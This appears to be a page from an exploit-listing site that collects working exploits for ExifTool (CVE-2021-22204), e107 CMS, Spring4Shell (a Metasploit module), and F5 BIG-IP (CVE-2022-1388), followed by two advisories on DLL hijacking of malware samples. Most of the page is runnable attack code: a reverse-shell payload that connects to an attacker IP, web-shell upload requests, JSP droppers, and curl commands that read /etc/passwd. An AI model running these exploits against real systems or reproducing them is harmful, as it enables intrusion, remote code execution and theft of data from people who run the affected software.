Latest exploits :: CodePwn

<pre><code># Exploit Title: ExifTool 12.23 - Arbitrary Code Execution # Date: 04/30/2022 # Exploit Author: UNICORD (NicPWNs & Dev-Yeoj) # Vendor Homepage: https://exiftool.org/ # Software Link: https://github.com/exiftool/exiftool/archive/refs/tags/12.23.zip # Version: 7.44-12.23 # Tested on: ExifTool 12.23 (Debian) # CVE: CVE-2021-22204 # Source: https://github.com/UNICORDev/exploit-CVE-2021-22204 # Description: Improper neutralization of user data in the DjVu file format in ExifTool versions 7.44 and up allows arbitrary code execution when parsing the malicious image #!/usr/bin/env python3 # Imports import base64 import os import subprocess import sys # Class for colors class color: red = '\033[91m' gold = '\033[93m' blue = '\033[36m' green = '\033[92m' no = '\033[0m' # Print UNICORD ASCII Art def UNICORD_ASCII(): print(rf""" {color.red} _ __,~~~{color.gold}/{color.red}_{color.no} {color.blue}__ ___ _______________ ___ ___{color.no} {color.red} ,~~`( )_( )-\| {color.blue}/ / / / |/ / _/ ___/ __ \/ _ \/ _ \{color.no} {color.red} |/| `--. {color.blue}/ /_/ / // // /__/ /_/ / , _/ // /{color.no} {color.green}_V__v___{color.red}!{color.green}_{color.red}!{color.green}__{color.red}!{color.green}_____V____{color.blue}\____/_/|_/___/\___/\____/_/|_/____/{color.green}....{color.no} """) # Print exploit help menu def help(): print(r"""UNICORD Exploit for CVE-2021-22204 Usage: python3 exploit-CVE-2021-22204.py -c <command> python3 exploit-CVE-2021-22204.py -s <local-IP> <local-port> python3 exploit-CVE-2021-22204.py -c <command> [-i <image.jpg>] python3 exploit-CVE-2021-22204.py -s <local-IP> <local-port> [-i <image.jpg>] python3 exploit-CVE-2021-22204.py -h Options: -c Custom command mode. Provide command to execute. -s Reverse shell mode. Provide local IP and port. -i Path to custom JPEG image. (Optional) -h Show this help menu. """) # Run the exploit def exploit(command): UNICORD_ASCII() # Create perl payload payload = "(metadata \"\c${" payload += command payload += "};\")" print(f"{color.red}RUNNING: {color.blue}UNICORD Exploit for CVE-2021-22204{color.no}") print(f"{color.red}PAYLOAD: {color.gold}" + payload + f"{color.no}") # Write payload to file payloadFile = open('payload','w') payloadFile.write(payload) payloadFile.close() # Bzz compress file subprocess.run(['bzz', 'payload', 'payload.bzz']) # Run djvumake subprocess.run(['djvumake', 'exploit.djvu', "INFO=1,1", 'BGjp=/dev/null', 'ANTz=payload.bzz']) if '-i' in sys.argv: imagePath = sys.argv[sys.argv.index('-i') + 1] subprocess.run(['cp',f'{imagePath}','./image.jpg','-n']) else: # Smallest possible JPEG image = b"/9j/4AAQSkZJRgABAQEASABIAAD/2wBDAAMCAgICAgMCAgIDAwMDBAYEBAQEBAgGBgUGCQgKCgkICQkKDA8MCgsOCwkJDRENDg8QEBEQCgwSExIQEw8QEBD/yQALCAABAAEBAREA/8wABgAQEAX/2gAIAQEAAD8A0s8g/9k=" # Write smallest possible JPEG image to file with open("image.jpg", "wb") as img: img.write(base64.decodebytes(image)) # Write exiftool config to file config = (r""" %Image::ExifTool::UserDefined = ( 'Image::ExifTool::Exif::Main' => { 0xc51b => { Name => 'HasselbladExif', Writable => 'string', WriteGroup => 'IFD0', }, }, ); 1; #end """) configFile = open('exiftool.config','w') configFile.write(config) configFile.close() # Exiftool config for output image subprocess.run(['exiftool','-config','exiftool.config','-HasselbladExif<=exploit.djvu','image.jpg','-overwrite_original_in_place','-q']) # Delete leftover files os.remove("payload") os.remove("payload.bzz") os.remove("exploit.djvu") os.remove("exiftool.config") # Print results print(f"{color.red}RUNTIME: {color.green}DONE - Exploit image written to 'image.jpg'{color.no}\n") exit() if __name__ == "__main__": args = ['-h','-c','-s','-i'] if args[0] in sys.argv: help() elif args[1] in sys.argv and not args[2] in sys.argv: exec = sys.argv[sys.argv.index(args[1]) + 1] command = f"system(\'{exec}\')" exploit(command) elif args[2] in sys.argv and not args[1] in sys.argv: localIP = sys.argv[sys.argv.index(args[2]) + 1] localPort = sys.argv[sys.argv.index(args[2]) + 2] command = f"use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in({localPort},inet_aton('{localIP}')))){{open(STDIN,'>&S');open(STDOUT,'>&S');open(STDERR,'>&S');exec('/bin/sh -i');}};" exploit(command) else: help() </code></pre>

<pre><code># Exploit Title: e107 CMS v3.2.1 - Multiple Vulnerabilities # Date: 30/04/2022 # Exploit Author: Hubert Wojciechowski # Contact Author: snup.php@gmail.com # Vendor Homepage: https://e107.org/ # Software Link: https://e107.org/download # Version: 3.2.1 # Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 ### XSS Reflected - Via adding comment (Authenticated) # POC Request: GET /e107/news.php/fnzi4'onchange='alert(1)'?extend.1 HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close Cookie: e107_tzOffset=-60; PHPSESSID=2ju9huul2lsl7565jpre0f2g40 Response: HTTP/1.1 200 OK Date: Tue, 14 Dec 2021 08:02:42 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11 X-Powered-By: e107 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache ETag: "71d7966eaa95fd8ac14da8baf3e0785d" Content-Length: 25059 Vary: Accept-Encoding X-Frame-Options: SAMEORIGIN Connection: close Content-Type: text/html; charset=utf-8 [...] <div class='media' > <form id='e-comment-form' method='post' action='/e107/news.php/fnzi4'onchange='alert(1)'?extend.1' > [...] User click to comment in news, writes any character in the comment field, and clicks elsewhere outside the comment field image.png ### Upload restriction bypass (Authenticated [Admin]) + Stored Xss. Account with administrative privileges can bypass upload image restriction (XSS Stored from .svg file) image->media manager->upload a file->Image/File URL admin can upload SVG from localhost ->http://127.0.0.1:8070/xxe_svg2.svg # POC Request: POST /e107/e107_admin/image.php?mode=main&action=dialog&for=page^&tagid=&iframe=1&bbcode=img HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 90 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/e107/e107_admin/image.php?mode=main&action=dialog&for=page^&tagid=&iframe=1&bbcode=img Cookie: e107_tzOffset=-60; PHPSESSID=t656bpkef7ndqm0p8j9ddf9atl Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: iframe Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 upload_url=http%3A%2F%2F127.0.0.1%3A8070%2Fxxe_svg2.svg&upload_remote_url=1&upload_caption= Response: HTTP/1.1 200 OK Date: Tue, 14 Dec 2021 02:06:14 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11 X-Powered-By: e107 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache ETag: "06ed5ef56b0f736995112cafd77e9ec0" Content-Length: 20878 Vary: Accept-Encoding X-Frame-Options: SAMEORIGIN Connection: close Content-Type: text/html; charset=utf-8 <!doctype html> <html lang="en"> <head> <title>Media Manager - Admin Area :: trrrrrrrrrrrrrrrr [...] <div class='well clearfix media-carousel-item-container'> <a data-toggle='context' data-bs-toggle='context' class='e-media-select ' data-id='' data-width='0' data-height='0' data-src='/e107/e107_media/416f4602e3/images/2021-12/xxe_svg2.svg' data-type='image' data-bbcode='img' data-target='' data-path='{e_MEDIA_IMAGE}2021-12/xxe_svg2.svg' data-preview='/e107/e107_media/416f4602e3/images/2021-12/xxe_svg2.svg' data-preview-html='PGltZyBjbGFzcz0iaW1nLXJlc3BvbnNpdmUgaW1nLWZsdWlkIiBzcmM9Ii9lMTA3L2UxMDdfbWVkaWEvNDE2ZjQ2MDJlMy9pbWFnZXMvMjAyMS0xMi94eGVfc3ZnLnN2ZyIgYWx0PSJ4eGVfc3ZnLnN2ZyIgc3Jjc2V0PSIvZTEwNy9lMTA3X21lZGlhLzQxNmY0NjAyZTMvaW1hZ2VzLzIwMjEtMTIveHhlX3N2Zy5zdmcgMngiIHdpZHRoPSIyMTAiIGhlaWdodD0iMTQwIiAgLz4=' title="xxe_svg2.svg ()" style='' href='#' ><img class="img-responsive img-fluid" alt="" src="/e107/e107_media/416f4602e3/images/2021-12/xxe_svg2.svg" style="display:inline-block" /> </a> [...] image.png ### Upload restriction bypass (Authenticated [Admin])+RCE Upload and execute .PHP file Attacker must upload file to ../../../ to parent directory, due to fact that somehow application user can only execute PHP code when uploading to parent directory. image.png Media Manager-> Media Upload/Import -> From a remote location # POC Request POST /e107/e107_admin/image.php?mode=main&action=import HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 109 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/e107/e107_admin/image.php?mode=main&action=import Cookie: e107_tzOffset=-60; PHPSESSID=9ngnt3lteu7133g74qb9nu3jtu Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 upload_url=http%3A%2F%2F127.0.0.1%3A8070%2Fcmd2.php&upload_remote_url=1&upload_caption=..%2F..%2F..%2Fcmd.php Response: HTTP/1.1 200 OK Date: Tue, 14 Dec 2021 09:02:08 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11 X-Powered-By: e107 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache ETag: "5b9621fc78893e36034b14f841f840f8" Content-Length: 26075 Vary: Accept-Encoding X-Frame-Options: SAMEORIGIN Connection: close Content-Type: text/html; charset=utf-8 <!doctype html> <html lang="en"> <head> <title>Media Manager - Admin Area :: trrrrrrrrrrrrrrrr [...] We can see uploaded PHP file on the server side. image.png cmd.php file source: <?php system('whoami'); ?> image.png ### Upload restriction bypass (Authenticated [Admin])+ Server file override Attacker can override example top.php file in the main directory of web application. Original file top.php in server: image.png We can override file via following upload functionality: Media Manager-> Media Upload/Import -> From a remote location # POC Request: POST /e107/e107_admin/image.php?mode=main&action=import HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 109 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/e107/e107_admin/image.php?mode=main&action=import Cookie: e107_tzOffset=-60; PHPSESSID=9ngnt3lteu7133g74qb9nu3jtu Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 upload_url=http%3A%2F%2F127.0.0.1%3A8070%2Fcmd2.php&upload_remote_url=1&upload_caption=..%2F..%2F..%2Ftop.php Response: HTTP/1.1 200 OK Date: Tue, 14 Dec 2021 09:20:10 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11 X-Powered-By: e107 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache ETag: "5b9621fc78893e36034b14f841f840f8" Content-Length: 26075 Vary: Accept-Encoding X-Frame-Options: SAMEORIGIN Connection: close Content-Type: text/html; charset=utf-8 [...] top.php file content was tampered: </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking # It's going to manipulate the Class Loader prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper include Msf::Exploit::EXE def initialize(info = {}) super( update_info( info, 'Name' => 'Spring Framework Class property RCE (Spring4Shell)', 'Description' => %q{ Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions when running on JDK 9 or above and specifically packaged as a traditional WAR and deployed in a standalone Tomcat instance are vulnerable to remote code execution due to an unsafe data binding used to populate an object from request parameters to set a Tomcat specific ClassLoader. By crafting a request to the application and referencing the org.apache.catalina.valves.AccessLogValve class through the classLoader with parameters such as the following: class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp, an unauthenticated attacker can gain remote code execution. }, 'Author' => [ 'vleminator <vleminator[at]gmail.com>' ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2022-22965'], ['URL', 'https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement'], ['URL', 'https://github.com/spring-projects/spring-framework/issues/28261'], ['URL', 'https://tanzu.vmware.com/security/cve-2022-22965'] ], 'Platform' => %w[linux win], 'Payload' => { 'Space' => 5000, 'DisableNops' => true }, 'Targets' => [ [ 'Java', { 'Arch' => ARCH_JAVA, 'Platform' => %w[linux win] }, ], [ 'Linux', { 'Arch' => [ARCH_X86, ARCH_X64], 'Platform' => 'linux' } ], [ 'Windows', { 'Arch' => [ARCH_X86, ARCH_X64], 'Platform' => 'win' } ] ], 'DisclosureDate' => '2022-03-31', 'DefaultTarget' => 0, 'Notes' => { 'AKA' => ['Spring4Shell', 'SpringShell'], 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] } ) ) register_options( [ Opt::RPORT(8080), OptString.new('TARGETURI', [ true, 'The path to the application action', '/app/example/HelloWorld.action']), OptString.new('PAYLOAD_PATH', [true, 'Path to write the payload', 'webapps/ROOT']), OptEnum.new('HTTP_METHOD', [false, 'HTTP method to use', 'Automatic', ['Automatic', 'GET', 'POST']]), ] ) register_advanced_options [ OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp']) ] end def jsp_dropper(file, exe) # The sun.misc.BASE64Decoder.decodeBuffer API is no longer available in Java 9. dropper = <<~EOS <%@ page import=\"java.io.FileOutputStream\" %> <%@ page import=\"java.util.Base64\" %> <%@ page import=\"java.io.File\" %> <% FileOutputStream oFile = new FileOutputStream(\"#{file}\", false); oFile.write(Base64.getDecoder().decode(\"#{Rex::Text.encode_base64(exe)}\")); oFile.flush(); oFile.close(); File f = new File(\"#{file}\"); f.setExecutable(true); Runtime.getRuntime().exec(\"#{file}\"); %> EOS dropper end def modify_class_loader(method, opts) cl_prefix = 'class.module.classLoader' send_request_cgi({ 'uri' => normalize_uri(target_uri.path.to_s), 'version' => '1.1', 'method' => method, 'headers' => { 'c1' => '<%', # %{c1}i replacement in payload 'c2' => '%>' # %{c2}i replacement in payload }, "vars_#{method == 'GET' ? 'get' : 'post'}" => { "#{cl_prefix}.resources.context.parent.pipeline.first.pattern" => opts[:payload], "#{cl_prefix}.resources.context.parent.pipeline.first.directory" => opts[:directory], "#{cl_prefix}.resources.context.parent.pipeline.first.prefix" => opts[:prefix], "#{cl_prefix}.resources.context.parent.pipeline.first.suffix" => opts[:suffix], "#{cl_prefix}.resources.context.parent.pipeline.first.fileDateFormat" => opts[:file_date_format] } }) end def check_log_file print_status("#{peer} - Waiting for the server to flush the logfile") print_status("#{peer} - Executing JSP payload at #{full_uri(@jsp_file)}") succeeded = retry_until_true(timeout: 60) do res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(@jsp_file) }) res&.code == 200 && !res.body.blank? end fail_with(Failure::UnexpectedReply, "Seems the payload hasn't been written") unless succeeded print_good("#{peer} - Log file flushed") end # Fix the JSP payload to make it valid once is dropped # to the log file def fix(jsp) output = '' jsp.each_line do |l| if l =~ /<%.*%>/ output << l elsif l =~ /<%/ next elsif l =~ /%>/ next elsif l.chomp.empty? next else output << "<% #{l.chomp} %>" end end output end def create_jsp jsp = <<~EOS <% File jsp=new File(getServletContext().getRealPath(File.separator) + File.separator + "#{@jsp_file}"); jsp.delete(); %> #{Faker::Internet.uuid} EOS if target['Arch'] == ARCH_JAVA jsp << fix(payload.encoded) else payload_exe = generate_payload_exe payload_filename = rand_text_alphanumeric(rand(4..7)) if target['Platform'] == 'win' payload_path = datastore['WritableDir'] + '\\' + payload_filename else payload_path = datastore['WritableDir'] + '/' + payload_filename end jsp << jsp_dropper(payload_path, payload_exe) register_files_for_cleanup(payload_path) end jsp end def check @checkcode = _check end def _check res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(Rex::Text.rand_text_alpha_lower(4..6)) ) return CheckCode::Unknown('Web server seems unresponsive') unless res if res.headers.key?('Server') res.headers['Server'].match(%r{(.*)/([\d|.]+)$}) else res.body.match(%r{Apache\s(.*)/([\d|.]+)}) end server = Regexp.last_match(1) || nil version = Rex::Version.new(Regexp.last_match(2)) || nil return Exploit::CheckCode::Safe('Application does not seem to be running under Tomcat') unless server && server.match(/Tomcat/) vprint_status("Detected #{server} #{version} running") if datastore['HTTP_METHOD'] == 'Automatic' # prefer POST over get to keep the vars out of the query string if possible methods = %w[POST GET] else methods = [ datastore['HTTP_METHOD'] ] end methods.each do |method| vars = "vars_#{method == 'GET' ? 'get' : 'post'}" res = send_request_cgi( 'method' => method, 'uri' => normalize_uri(datastore['TARGETURI']), vars => { 'class.module.classLoader.DefaultAssertionStatus' => Rex::Text.rand_text_alpha_lower(4..6) } ) # setting the default assertion status to a valid status send_request_cgi( 'method' => method, 'uri' => normalize_uri(datastore['TARGETURI']), vars => { 'class.module.classLoader.DefaultAssertionStatus' => 'true' } ) return Exploit::CheckCode::Appears(details: { method: method }) if res.code == 400 end Exploit::CheckCode::Safe end def exploit prefix_jsp = rand_text_alphanumeric(rand(3..5)) date_format = rand_text_numeric(rand(1..4)) @jsp_file = prefix_jsp + date_format + '.jsp' http_method = datastore['HTTP_METHOD'] if http_method == 'Automatic' # if the check was skipped but we need to automatically identify the method, we have to run it here @checkcode = check if @checkcode.nil? http_method = @checkcode.details[:method] fail_with(Failure::BadConfig, 'Failed to automatically identify the HTTP method') if http_method.blank? print_good("Automatically identified HTTP method: #{http_method}") end # if the check method ran automatically, add a short delay before continuing with exploitation sleep(5) if @checkcode # Prepare the JSP print_status("#{peer} - Generating JSP...") # rubocop:disable Style/FormatStringToken jsp = create_jsp.gsub('<%', '%{c1}i').gsub('%>', '%{c2}i') # rubocop:enable Style/FormatStringToken # Modify the Class Loader print_status("#{peer} - Modifying Class Loader...") properties = { payload: jsp, directory: datastore['PAYLOAD_PATH'], prefix: prefix_jsp, suffix: '.jsp', file_date_format: date_format } res = modify_class_loader(http_method, properties) unless res fail_with(Failure::TimeoutExpired, "#{peer} - No answer") end # No matter what happened, try to 'restore' the Class Loader properties = { payload: '', directory: '', prefix: '', suffix: '', file_date_format: '' } modify_class_loader(http_method, properties) check_log_file handler end # Retry the block until it returns a truthy value. Each iteration attempt will # be performed with expoential backoff. If the timeout period surpasses, false is returned. def retry_until_true(timeout:) start_time = Process.clock_gettime(Process::CLOCK_MONOTONIC, :second) ending_time = start_time + timeout retry_count = 0 while Process.clock_gettime(Process::CLOCK_MONOTONIC, :second) < ending_time result = yield return result if result retry_count += 1 remaining_time_budget = ending_time - Process.clock_gettime(Process::CLOCK_MONOTONIC, :second) break if remaining_time_budget <= 0 delay = 2**retry_count if delay >= remaining_time_budget delay = remaining_time_budget vprint_status("Final attempt. Sleeping for the remaining #{delay} seconds out of total timeout #{timeout}") else vprint_status("Sleeping for #{delay} seconds before attempting again") end sleep delay end false end end </code></pre>

<pre><code># F5 BIG-IP RCE exploitation (CVE-2022-1388) POST (1): POST /mgmt/tm/util/bash HTTP/1.1 Host: <redacted>:8443 Authorization: Basic YWRtaW46 Connection: keep-alive, X-F5-Auth-Token X-F5-Auth-Token: 0 {"command": "run" , "utilCmdArgs": " -c 'id' " } curl commandliner: $ curl -i -s -k -X $'POST' -H $'Host: <redacted>:8443' -H $'Authorization: Basic YWRtaW46' -H $'Connection: keep-alive, X-F5-Auth-Token' -H $'X-F5-Auth-Token: 0' -H $'Content-Length: 52' --data-binary $'{\"command\": \"run\" , \"utilCmdArgs\": \" -c \'id\' \" }\x0d\x0a' $'https://<redacted>:8443/mgmt/tm/util/bash' --proxy http://127.0.0.1:8080 POST (2): POST /mgmt/tm/util/bash HTTP/1.1 Host: <redateced>:8443 Authorization: Basic YWRtaW46 Connection: keep-alive, X-F5-Auth-Token X-F5-Auth-Token: 0 {"command": "run" , "utilCmdArgs": " -c ' cat /etc/passwd' " } curl commandliner: $ curl -i -s -k -X $'POST' -H $'Host: <redacted>:8443' -H $'Authorization: Basic YWRtaW46' -H $'Connection: keep-alive, X-F5-Auth-Token' -H $'X-F5-Auth-Token: 0' --data-binary $'{\"command\": \"run\" , \"utilCmdArgs\": \" -c \' cat /etc/passwd\' \" }\x0d\x0a\x0d\x0a' $'https://<redacted>/mgmt/tm/util/bash' --proxy http://127.0.0.1:8080 Note: Issue could be related between frontend and backend authentication "Jetty" with empty credentials "admin: <empty>" + value of headers ,see "HTTP hop_by_hop request headers"... References and Fixes : * https://support.f5.com/csp/article/K23605346 * https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1388 Here the documentation used latest nites: * https://clouddocs.f5.com/api/icontrol-rest/ HTTP hop_by_hop request headers: * https://portswigger.net/research/top-10-web-hacking-techniques-of-2019-nominations-open # Author Alex Hernandez aka @_alt3kx_ </code></pre>

<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022 Original source: https://malvuln.com/advisory/d6751b148461e0f863548be84020b879.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: APT28 FancyBear Vulnerability: Code Execution Description: FancyBear looks for and executes DLLs in its current directory. Therefore, we can potentially hijack a vuln DLL execute our own code, control and terminate the malware. The exploit dll will check if the current directory is "C:\Windows\System32", if not we grab our process ID and terminate. We do not need to rely on hash signature or third-party product, the malwares own flaw will do the work for us. Endpoint protection systems and or antivirus can potentially be killed prior to executing malware, but this method cannot as theres nothing to kill the DLL just lives on disk waiting. From defensive perspective you can add the DLLs to a specific network share containing important data as a layered approach. All basic tests were conducted successfully in a virtual machine environment. Family: FancyBear Type: PE32 MD5: d6751b148461e0f863548be84020b879 Vuln ID: MVID-2022-0594 Disclosure: 05/09/2022 Exploit/PoC: Video Poc URL: https://www.youtube.com/watch?v=8v2bqRX2AEU Exploit/PoC: 1) Compile the following C code as "winhttp.dll" 2) Place the DLL in same directory as the malware 3) Optional - Hide it: attrib +s +h "winhttp.dll" 4) Run FancyBear #include "windows.h" //By malvuln //Purpose: Exploit FancyBear //MD5: d6751b148461e0f863548be84020b879 /** DISCLAIMER: Author is NOT responsible for any damages whatsoever by using this software or improper malware handling. By using this code you assume and accept all risk implied or otherwise. **/ //gcc -c winhttp.c -m32 //gcc -shared -o winhttp.dll winhttp.o -m32 BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){ switch (reason) { case DLL_PROCESS_ATTACH: MessageBox(NULL, "Code Exec", "by malvuln", MB_OK); TCHAR buf[MAX_PATH]; GetCurrentDirectory(MAX_PATH, TEXT(buf)); int rc = strcmp("C:\\Windows\\System32", TEXT(buf)); if(rc != 0){ HANDLE handle = OpenProcess(PROCESS_TERMINATE, FALSE, getpid()); if (NULL != handle) { TerminateProcess(handle, 0); CloseHandle(handle); } } break; } return TRUE; } Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). </code></pre>

<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022 Original source: https://malvuln.com/advisory/46bfd4f1d581d7c0121d2b19a005d3df.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: Ransom.Satana Vulnerability: Code Execution Description: Satana searches for and loads a DLL named "wow64log.dll" in Windows\System32. Therefore, we can drop our own DLL to intercept and terminate the malware pre-encryption. The exploit dll will simply display a Win32API message box and call exit(). The exploit DLL must export "InterlockedExchange" function or it fails with error. We do not need to rely on hash signature or third-party product, the malwares own flaw will do the work for us. Endpoint protection systems and or antivirus can potentially be killed prior to executing malware, but this method cannot as theres nothing to kill the DLL just lives on disk waiting. From defensive perspective you can add the DLLs to a specific network share containing important data as a layered approach. All basic tests were conducted successfully in a virtual machine environment. Family: Satana Type: PE32 MD5: 46bfd4f1d581d7c0121d2b19a005d3df Vuln ID: MVID-2022-0593 Disclosure: 05/07/2022 Video PoC URL: https://www.youtube.com/watch?v=AkuqcPZbah8 Exploit/PoC: 1) Compile the following C code as "wow64log.dll" as x64 2) Place the DLL in Windows\System32 3) Run the malware #include "windows.h" //By malvuln //Purpose: Exploit Satana //MD5: 46bfd4f1d581d7c0121d2b19a005d3df /** DISCLAIMER: Author is NOT responsible for any damages whatsoever by using this software or improper malware handling. By using this code you assume and accept all risk implied or otherwise. **/ //compile as x64 //gcc -c wow64log.c //gcc -shared -o wow64log.dll wow64log.o //DLL must live under Windows\System32 dir BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){ switch (reason) { case DLL_PROCESS_ATTACH: MessageBox(NULL, "Code Exec", "by malvuln", MB_OK); exit(0); break; } return TRUE; } extern __declspec(dllexport) WINBASEAPI LONG WINAPI InterlockedExchange (LONG volatile *Target, LONG Value){ exit(1); } Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). </code></pre>